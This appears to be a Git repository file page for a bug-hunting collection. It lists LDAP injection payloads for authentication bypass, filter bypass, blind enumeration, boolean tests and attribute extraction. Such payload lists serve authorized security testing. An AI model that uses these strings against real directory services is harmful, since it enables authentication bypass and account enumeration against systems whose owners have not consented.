0x5t4l1n/hunting
1
0
Fork 0
mirror of https://github.com/0x5t4l1n/hunting.git synced 2026-05-26 11:35:51 +00:00
Code Issues Packages Projects Releases Wiki Activity
Files
ab9c127df32a398f09c7f27c314cd772d2f34d8e
hunting/OWASP-Top-10/A03-Injection/ldap-injection-payloads.txt
T
copilot-swe-agent[bot] ab9c127df3 Add comprehensive OWASP Top 10 directory structure with injection payloads 
Co-authored-by: Stalin-143 <161853795+Stalin-143@users.noreply.github.com>
2026-01-04 18:24:32 +00:00

40 lines
568 B
Plaintext
Raw Blame History

# LDAP Injection Payloads
# Basic LDAP injection
*
*(uid=*)
*(cn=*)
*(objectClass=*)
# Authentication bypass
*)(uid=*))(|(uid=*
*)(|(uid=*))
*)(cn=admin)(|(cn=*
admin)(&(uid=*))
# Filter bypass
*)(objectClass=*))(&(objectClass=*
*)(|(password=*))
*)(cn=*)(|(cn=*
# Blind LDAP injection
*)(cn=a*
*)(cn=ad*
*)(cn=adm*
*)(cn=admin*
# Boolean-based
(&(uid=admin)(password=*))
(&(uid=admin)(!(password=wrong)))
(|(uid=admin)(uid=administrator))
# Wildcard usage
uid=*
cn=*
sn=*
mail=*
# Attribute extraction
*)(objectClass=*))(%26(objectClass=*
*)(uid=*))(%26(uid=*
Reference in New Issue View Git Blame Copy Permalink